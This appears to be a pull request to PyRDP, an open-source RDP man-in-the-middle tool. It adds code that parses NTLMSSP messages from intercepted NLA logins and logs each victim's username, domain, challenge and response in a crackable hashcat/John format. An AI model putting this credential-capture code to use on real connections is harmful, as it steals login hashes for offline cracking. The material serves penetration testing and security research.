### PR TITLE
Log NTLMSSP hashes when using NLA

### DIFF
--- a/CHANGELOG.adoc
+++ b/CHANGELOG.adoc
@@ -23,6 +23,7 @@ For a detailed view of what has changed, refer to the {uri-repo}/commits/master[
 
 *MITM*
 
+* Added NTLMSSP hash logging when NLA is used with NTLM as the authentication protocol. Hashes are logged to `pyrdp_output/logs/ntlmssp.log` (see {uri-issue}307[#307])
 * Added detection function for BlueKeep scans / exploit attempts. PyRDP will log the attempt and shut down the connection. The JSON log has an exploitInfo attribute as well as a parserInfo attribute to help investigate what happened.
 * Added better logging for parser errors. PyRDP will now log which parser crashed and the data that was fed to that parser to make it crash. This makes it easier to investigate bugs and exploits. In JSON logs, this information shows up in the parserInfo attribute.
 * Files intercepted or crawled by the MITM are now named according to the sha1 hash of their contents and stored in the `pyrdp_output/files` folder (see {uri-issue}261[#261])

--- a/pyrdp/enum/__init__.py
+++ b/pyrdp/enum/__init__.py
@@ -1,6 +1,6 @@
 #
 # This file is part of the PyRDP project.
-# Copyright (C) 2018-2020 GoSecure Inc.
+# Copyright (C) 2018-2021 GoSecure Inc.
 # Licensed under the GPLv3 or later.
 #
 # flake8: noqa
@@ -9,6 +9,7 @@ from pyrdp.enum.core import ParserMode
 from pyrdp.enum.gcc import GCCPDUType
 from pyrdp.enum.mcs import MCSChannelID, MCSChannelName, MCSPDUType, MCSResult
 from pyrdp.enum.negotiation import NegotiationRequestFlags, NegotiationType
+from pyrdp.enum.ntlmssp import NTLMSSPMessageType
 from pyrdp.enum.player import MouseButton, PlayerPDUType
 from pyrdp.enum.rdp import *
 from pyrdp.enum.orders import DrawingOrderControlFlags

--- a/pyrdp/enum/ntlmssp.py
+++ b/pyrdp/enum/ntlmssp.py
@@ -1,0 +1,13 @@
+#
+# This file is part of the PyRDP project.
+# Copyright (C) 2021 GoSecure Inc.
+# Licensed under the GPLv3 or later.
+#
+
+from enum import IntEnum
+
+
+class NTLMSSPMessageType(IntEnum):
+    NEGOTIATE_MESSAGE = 1
+    CHALLENGE_MESSAGE = 2
+    AUTHENTICATE_MESSAGE = 3

--- a/pyrdp/logging/formatters.py
+++ b/pyrdp/logging/formatters.py
@@ -1,6 +1,6 @@
 #
 # This file is part of the PyRDP project.
-# Copyright (C) 2018 GoSecure Inc.
+# Copyright (C) 2018-2021 GoSecure Inc.
 # Licensed under the GPLv3 or later.
 #
 
@@ -74,6 +74,21 @@ class SSLSecretFormatter(logging.Formatter):
     def __init__(self):
         super().__init__()
 
-    def format(self, record: logging.LogRecord):
+    def format(self, record: logging.LogRecord) -> str:
         return "CLIENT_RANDOM {} {}".format(binascii.hexlify(record.msg).decode(),
                                             binascii.hexlify(record.args[0]).decode())
+
+
+class NTLMSSPHashFormatter(logging.Formatter):
+    """
+    Custom formatter used to log NTLMSSP hashes.
+    """
+
+    @staticmethod
+    def formatNTLMSSPHash(user: str, domain: str, serverChallenge: bytes, proof: bytes, response: bytes) -> str:
+        return f"{user}::{domain}:{serverChallenge.hex()}:{proof.hex()}:{response.hex()}"
+
+    def format(self, record: logging.LogRecord) -> str:
+        user = record.msg
+        domain, serverChallenge, proof, response = record.args[0 : 4]
+        return NTLMSSPHashFormatter.formatNTLMSSPHash(user, domain, serverChallenge, proof, response)

--- a/pyrdp/logging/log.py
+++ b/pyrdp/logging/log.py
@@ -1,6 +1,6 @@
 #
 # This file is part of the PyRDP project.
-# Copyright (C) 2018-2020 GoSecure Inc.
+# Copyright (C) 2018-2021 GoSecure Inc.
 # Licensed under the GPLv3 or later.
 #
 
@@ -19,6 +19,7 @@ class LOGGER_NAMES:
     MITM_CONNECTIONS = f"{MITM}.connections"
     PLAYER = f"{PYRDP}.player"
     PLAYER_UI = f"{PLAYER}.ui"
+    NTLMSSP = f"ntlmssp"
 
     # Independent logger
     CRAWLER = "crawler"

--- a/pyrdp/mitm/RDPMITM.py
+++ b/pyrdp/mitm/RDPMITM.py
@@ -1,6 +1,6 @@
 #
 # This file is part of the PyRDP project.
-# Copyright (C) 2019-2020 GoSecure Inc.
+# Copyright (C) 2019-2021 GoSecure Inc.
 # Licensed under the GPLv3 or later.
 #
 
@@ -17,40 +17,31 @@ from pyrdp.enum import MCSChannelName, ParserMode, PlayerPDUType, ScanCode, Segm
 from pyrdp.layer import ClipboardLayer, DeviceRedirectionLayer, LayerChainItem, RawLayer, \
     VirtualChannelLayer
 from pyrdp.logging import RC4LoggingObserver
+from pyrdp.logging.StatCounter import StatCounter
 from pyrdp.logging.adapters import SessionLogger
 from pyrdp.logging.observers import FastPathLogger, LayerLogger, MCSLogger, SecurityLogger, \
     SlowPathLogger, X224Logger
-from pyrdp.logging.StatCounter import StatCounter
 from pyrdp.mcs import MCSClientChannel, MCSServerChannel
 from pyrdp.mitm.AttackerMITM import AttackerMITM
 from pyrdp.mitm.ClipboardMITM import ActiveClipboardStealer, PassiveClipboardStealer
-from pyrdp.mitm.config import MITMConfig
 from pyrdp.mitm.DeviceRedirectionMITM import DeviceRedirectionMITM
 from pyrdp.mitm.FastPathMITM import FastPathMITM
 from pyrdp.mitm.FileCrawlerMITM import FileCrawlerMITM
-from pyrdp.mitm.layerset import RDPLayerSet
 from pyrdp.mitm.MCSMITM import MCSMITM
 from pyrdp.mitm.MITMRecorder import MITMRecorder
 from pyrdp.mitm.PlayerLayerSet import TwistedPlayerLayerSet
 from pyrdp.mitm.SecurityMITM import SecurityMITM
 from pyrdp.mitm.SlowPathMITM import SlowPathMITM
-from pyrdp.mitm.state import RDPMITMState
 from pyrdp.mitm.TCPMITM import TCPMITM
 from pyrdp.mitm.VirtualChannelMITM import VirtualChannelMITM
 from pyrdp.mitm.X224MITM import X224MITM
+from pyrdp.mitm.config import MITMConfig
+from pyrdp.mitm.layerset import RDPLayerSet
+from pyrdp.mitm.state import RDPMITMState
 from pyrdp.recording import FileLayer, RecordingFastPathObserver, RecordingSlowPathObserver, \
     Recorder
-
-from pyrdp.layer.segmentation import SegmentationObserver
-
-
-class PacketForwarder(SegmentationObserver):
-    """Handles unknown segmentation packets by forwarding them transparently."""
-    def __init__(self, sink):
-        self._forwarder = sink
-
-    def onUnknownHeader(self, header, data: bytes):
-        self._forwarder.sendBytes(data)
+from pyrdp.security import NTLMSSPState
+from pyrdp.security.nla import NLAHandler
 
 
 class RDPMITM:
@@ -237,8 +228,9 @@ class RDPMITM:
         self.onTlsReady = None
 
         # Add unknown packet handlers.
-        self.client.segmentation.addObserver(PacketForwarder(self.server.tcp))
-        self.server.segmentation.addObserver(PacketForwarder(self.client.tcp))
+        ntlmSSPState = NTLMSSPState()
+        self.client.segmentation.addObserver(NLAHandler(self.server.tcp, ntlmSSPState, self.getLog("ntlmssp")))
+        self.server.segmentation.addObserver(NLAHandler(self.client.tcp, ntlmSSPState, self.getLog("ntlmssp")))
 
     def startTLS(self, onTlsReady: typing.Callable[[], None]):
         """

--- a/pyrdp/mitm/mitm.default.ini
+++ b/pyrdp/mitm/mitm.default.ini
@@ -100,6 +100,11 @@ handlers = ssl, ssl_console
 # Always log SSL master secrets.
 level    = DEBUG
 
+[logs:loggers:ntlmssp]
+handlers = ntlmssp
+# Always log NTLMSSP hashes.
+level    = DEBUG
+
 
 # -----------------------------------------------------------------
 # WARNING:
@@ -161,6 +166,11 @@ class     = logging.StreamHandler
 stream    = ext://sys.stderr
 formatter = ssl
 
+[logs:handlers:ntlmssp]
+class     = logging.FileHandler
+filename  = ${vars:output_dir}/${vars:log_dir}/ntlmssp.log
+formatter = ntlmssp
+
 # -----------------------------------------------------------------
 # Formatters
 # -----------------------------------------------------------------
@@ -195,3 +205,7 @@ sessionID = GLOBAL
 # Raw SSL Secret formatting for dumping secrets
 [logs:formatters:ssl]
 () = pyrdp.logging.formatters.SSLSecretFormatter
+
+# NTLMSSP hash formatting for dumping NTLM hashes
+[logs:formatters:ntlmssp]
+() = pyrdp.logging.formatters.NTLMSSPHashFormatter

--- a/pyrdp/parser/__init__.py
+++ b/pyrdp/parser/__init__.py
@@ -1,6 +1,6 @@
 #
 # This file is part of the PyRDP project.
-# Copyright (C) 2018 GoSecure Inc.
+# Copyright (C) 2018-2021 GoSecure Inc.
 # Licensed under the GPLv3 or later.
 #
 
@@ -17,6 +17,7 @@ from pyrdp.parser.rdp.orders import OrdersParser
 from pyrdp.parser.rdp.input import SlowPathInputParser
 from pyrdp.parser.rdp.licensing import LicensingParser
 from pyrdp.parser.rdp.negotiation import NegotiationRequestParser, NegotiationResponseParser
+from pyrdp.parser.rdp.ntlmssp import NTLMSSPParser
 from pyrdp.parser.rdp.pointer import PointerEventParser
 from pyrdp.parser.rdp.security import BasicSecurityParser, FIPSSecurityParser, SignedSecurityParser
 from pyrdp.parser.rdp.slowpath import SlowPathParser

--- a/pyrdp/parser/rdp/ntlmssp.py
+++ b/pyrdp/parser/rdp/ntlmssp.py
@@ -1,0 +1,88 @@
+#
+# This file is part of the PyRDP project.
+# Copyright (C) 2021 GoSecure Inc.
+# Licensed under the GPLv3 or later.
+#
+
+from io import BytesIO
+from typing import Callable, Dict
+
+from pyrdp.core import Uint16LE, Uint32LE
+from pyrdp.parser.parser import Parser
+from pyrdp.pdu import NTLMSSPChallengePDU, NTLMSSPAuthenticatePDU, NTLMSSPNegotiatePDU, NTLMSSPPDU
+
+
+class NTLMSSPParser(Parser):
+    """
+    Parser for NLA/NTLMSSP
+    TODO: Add other fields to PDUs if necessary
+    TODO: Implement write if necessary
+    """
+
+    def __init__(self):
+        self.handlers: Dict[int, Callable[[bytes, BytesIO], NTLMSSPPDU]] = {
+            1: self.parseNTLMSSPNegotiate,
+            2: self.parseNTLMSSPChallenge,
+            3: self.parseNTLMSSPAuthenticate
+        }
+
+    def findMessage(self, data: bytes) -> int:
+        """
+        Check if data contains an NTLMSSP message.
+        Returns the offset in data of the start of the message or -1 otherwise.
+        """
+        return data.find(b"NTLMSSP\x00")
+
+    def doParse(self, data: bytes) -> NTLMSSPPDU:
+        stream = BytesIO(data)
+        signature = stream.read(8)
+        messageType = Uint32LE.unpack(stream)
+
+        return self.handlers[messageType](data, stream)
+
+    def parseField(self, data: bytes, fields: bytes) -> bytes:
+        length = Uint16LE.unpack(fields[0: 2])
+        offset = Uint32LE.unpack(fields[4: 8])
+
+        if length != 0:
+            return data[offset : offset + length]
+        else:
+            return b""
+
+    def parseNTLMSSPNegotiate(self, data: bytes, stream: BytesIO) -> NTLMSSPNegotiatePDU:
+        return NTLMSSPNegotiatePDU()
+
+    def parseNTLMSSPChallenge(self, data: bytes, stream: BytesIO) -> NTLMSSPChallengePDU:
+        targetNameFields = stream.read(8)
+        negotiateFlags = stream.read(4)
+        serverChallenge = stream.read(8)
+        reserved = stream.read(8)
+        targetInfoFields = stream.read(8)
+        version = stream.read(8)
+
+        targetName = self.parseField(data, targetNameFields)
+        targetInfo = self.parseField(data, targetInfoFields)
+        return NTLMSSPChallengePDU(serverChallenge)
+
+    def parseNTLMSSPAuthenticate(self, data: bytes, stream: BytesIO) -> NTLMSSPAuthenticatePDU:
+        lmChallengeResponseFields = stream.read(8)
+        ntChallengeResponseFields = stream.read(8)
+        domainNameFields = stream.read(8)
+        userNameFields = stream.read(8)
+        workstationFields = stream.read(8)
+        encryptedRandomSessionKeyFields = stream.read(8)
+        negotiationFlags = stream.read(4)
+        version = stream.read(8)
+        mic = stream.read(16)
+
+        lmChallengeResponse = self.parseField(data, lmChallengeResponseFields)
+        ntChallengeResponse = self.parseField(data, ntChallengeResponseFields)
+        domain = self.parseField(data, domainNameFields).decode("utf-16le")
+        user = self.parseField(data, userNameFields).decode("utf-16le")
+        workstation = self.parseField(data, workstationFields)
+        encryptedRandomSessionKey = self.parseField(data, encryptedRandomSessionKeyFields)
+
+        proof = ntChallengeResponse[: 16]
+        response = ntChallengeResponse[16 :]
+
+        return NTLMSSPAuthenticatePDU(user, domain, proof, response)

--- a/pyrdp/pdu/__init__.py
+++ b/pyrdp/pdu/__init__.py
@@ -1,6 +1,6 @@
 #
 # This file is part of the PyRDP project.
-# Copyright (C) 2018-2020 GoSecure Inc.
+# Copyright (C) 2018-2021 GoSecure Inc.
 # Licensed under the GPLv3 or later.
 #
 # flake8: noqa
@@ -35,6 +35,7 @@ from pyrdp.pdu.rdp.input import ExtendedMouseEvent, KeyboardEvent, MouseEvent, S
     UnicodeKeyboardEvent, UnusedEvent
 from pyrdp.pdu.rdp.licensing import LicenseBinaryBlob, LicenseErrorAlertPDU, LicensingPDU
 from pyrdp.pdu.rdp.negotiation import NegotiationFailurePDU, NegotiationRequestPDU, NegotiationResponsePDU
+from pyrdp.pdu.rdp.ntlmssp import NTLMSSPPDU, NTLMSSPNegotiatePDU, NTLMSSPChallengePDU, NTLMSSPAuthenticatePDU
 from pyrdp.pdu.rdp.pointer import Point, PointerCacheEvent, PointerColorEvent, PointerEvent, PointerNewEvent, \
     PointerPositionEvent, PointerSystemEvent
 from pyrdp.pdu.rdp.security import SecurityExchangePDU, SecurityPDU

--- a/pyrdp/pdu/rdp/ntlmssp.py
+++ b/pyrdp/pdu/rdp/ntlmssp.py
@@ -1,0 +1,34 @@
+#
+# This file is part of the PyRDP project.
+# Copyright (C) 2021 GoSecure Inc.
+# Licensed under the GPLv3 or later.
+#
+
+from pyrdp.enum import NTLMSSPMessageType
+from pyrdp.pdu.pdu import PDU
+
+
+class NTLMSSPPDU(PDU):
+    def __init__(self, messageType: NTLMSSPMessageType):
+        super().__init__()
+        self.messageType = messageType
+
+
+class NTLMSSPNegotiatePDU(NTLMSSPPDU):
+    def __init__(self):
+        super().__init__(NTLMSSPMessageType.NEGOTIATE_MESSAGE)
+
+
+class NTLMSSPChallengePDU(NTLMSSPPDU):
+    def __init__(self, serverChallenge: bytes):
+        super().__init__(NTLMSSPMessageType.CHALLENGE_MESSAGE)
+        self.serverChallenge = serverChallenge
+
+
+class NTLMSSPAuthenticatePDU(NTLMSSPPDU):
+    def __init__(self, user: str, domain: str, proof: bytes, response: bytes):
+        super().__init__(NTLMSSPMessageType.AUTHENTICATE_MESSAGE)
+        self.user = user
+        self.domain = domain
+        self.proof = proof
+        self.response = response

--- a/pyrdp/security/__init__.py
+++ b/pyrdp/security/__init__.py
@@ -1,9 +1,10 @@
 #
 # This file is part of the PyRDP project.
-# Copyright (C) 2018 GoSecure Inc.
+# Copyright (C) 2018-2021 GoSecure Inc.
 # Licensed under the GPLv3 or later.
 #
 
 from pyrdp.security.crypto import RC4Crypter
+from pyrdp.security.ntlmssp import NTLMSSPState
 from pyrdp.security.rc4proxy import RC4CrypterProxy
 from pyrdp.security.settings import SecuritySettings, SecuritySettingsObserver

--- a/pyrdp/security/nla.py
+++ b/pyrdp/security/nla.py
@@ -1,0 +1,60 @@
+#
+# This file is part of the PyRDP project.
+# Copyright (C) 2021 GoSecure Inc.
+# Licensed under the GPLv3 or later.
+#
+
+import logging
+
+from pyrdp.enum import NTLMSSPMessageType
+from pyrdp.layer import SegmentationObserver, IntermediateLayer
+from pyrdp.logging import LOGGER_NAMES
+from pyrdp.logging.formatters import NTLMSSPHashFormatter
+from pyrdp.parser import NTLMSSPParser
+from pyrdp.pdu import NTLMSSPPDU, NTLMSSPAuthenticatePDU
+from pyrdp.security import NTLMSSPState
+
+
+class NLAHandler(SegmentationObserver):
+    """
+    Handles NLA packets by forwarding them transparently, using the onUnknownHeader event from SegmentationObserver.
+    The event will be triggered when packets are sent that are neither fast-path nor TPKT (i.e: NLA).
+    This also logs the hash of NLA connection attempts.
+    """
+
+    def __init__(self, sink: IntermediateLayer, state: NTLMSSPState, log: logging.LoggerAdapter):
+        """
+        Create a new NLA Handler.
+        sink: layer to forward packets to.
+        state: NTLMSSPState that is shared between both the client-facing handler and the server-facing handler.
+        """
+
+        super().__init__()
+        self.sink = sink
+        self.ntlmSSPState = state
+        self.log = log
+        self.ntlmSSPParser = NTLMSSPParser()
+
+    def onUnknownHeader(self, header, data: bytes):
+        messageOffset = self.ntlmSSPParser.findMessage(data)
+
+        if messageOffset != -1:
+            message: NTLMSSPPDU = self.ntlmSSPParser.parse(data[messageOffset :])
+            self.ntlmSSPState.setMessage(message)
+
+            if message.messageType == NTLMSSPMessageType.AUTHENTICATE_MESSAGE:
+                message: NTLMSSPAuthenticatePDU
+                user = message.user
+                domain = message.domain
+                serverChallenge = self.ntlmSSPState.challenge.serverChallenge
+                proof = message.proof
+                response = message.response
+
+                logging.getLogger(LOGGER_NAMES.NTLMSSP).info(user, domain, serverChallenge, proof, response)
+
+                ntlmSSPHash = NTLMSSPHashFormatter.formatNTLMSSPHash(user, domain, serverChallenge, proof, response)
+                self.log.info("[!] NTLMSSP Hash: %(ntlmSSPHash)s", {
+                    "ntlmSSPHash": (ntlmSSPHash)
+                })
+
+        self.sink.sendBytes(data)

--- a/pyrdp/security/ntlmssp.py
+++ b/pyrdp/security/ntlmssp.py
@@ -1,0 +1,25 @@
+#
+# This file is part of the PyRDP project.
+# Copyright (C) 2021 GoSecure Inc.
+# Licensed under the GPLv3 or later.
+#
+
+from typing import Optional
+
+from pyrdp.enum import NTLMSSPMessageType
+from pyrdp.pdu import NTLMSSPAuthenticatePDU, NTLMSSPChallengePDU, NTLMSSPNegotiatePDU, NTLMSSPPDU
+
+
+class NTLMSSPState:
+    def __init__(self):
+        self.negotiate: Optional[NTLMSSPNegotiatePDU] = None
+        self.challenge: Optional[NTLMSSPChallengePDU] = None
+        self.authenticate: Optional[NTLMSSPAuthenticatePDU] = None
+
+    def setMessage(self, pdu: NTLMSSPPDU):
+        if pdu.messageType == NTLMSSPMessageType.NEGOTIATE_MESSAGE:
+            self.negotiate = pdu
+        elif pdu.messageType == NTLMSSPMessageType.CHALLENGE_MESSAGE:
+            self.challenge = pdu
+        else:
+            self.authenticate = pdu


### PR DESCRIPTION
Log NTLMSSP hashes in a format usable by John the Ripper and Hashcat when the client uses NLA.

NTLMSSP hashes are stored in `pyrdp_output/logs/ntlmssp.log` and are also logged to the console and in JSON format.

This might actually be usable for gathering hashes in pentest scenarios, but I haven't tried anything like that yet.